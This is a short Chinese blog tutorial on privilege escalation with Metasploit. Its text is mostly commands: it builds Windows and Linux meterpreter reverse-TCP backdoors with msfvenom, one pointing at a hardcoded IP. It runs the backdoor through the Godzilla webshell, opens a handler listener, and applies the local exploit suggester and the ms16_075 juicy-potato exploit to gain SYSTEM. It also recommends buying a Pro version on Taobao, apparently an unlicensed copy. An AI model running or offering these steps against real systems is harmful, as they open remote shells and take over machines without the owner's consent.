MSF使用教程-CSDN博客
利用MSF提权
目前的msf版本有bug可以TB上购买pro版本嘎嘎稳
https://blog.csdn.net/qq_46717339/article/details/122653084
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
启动msf:
msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=【msf主机地址】 LPORT=4444 -f exe -o msf.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=124.71.111.64 LPORT=1122 -f elf -o msf
上传msf.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp //payload与上面生成后门的模块保持一致
set lhost 0.0.0.0
set lport 3333
这里设置0.0.0.0就是监听本地所有的网卡
监听端口3333 记得放行安全组
run
哥斯拉执行msf.exe
收到信息
可以看到此时还是这个权限
全自动:快速识别系统中可能被利用的漏洞
background //返回
use post/multi/recon/local_exploit_suggester
set showdescription true //设置为显示说明
backgroud 然后执行命令
show options
可以看到这里seesion为空,我们要设置session
sessions查看
set seesion 设置session
run 检测是否有利用的漏洞
检测完后,就会显示可能存在的漏洞
background
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit
use 【漏洞】 使用漏洞。名字就是上面显示的
show options 查看session
set session 1再设置一下session
run 攻击session指定的目标
这里我不知道什么原因,提权失败了。如果成功就会多出一个session
可以看到getuid 返回是system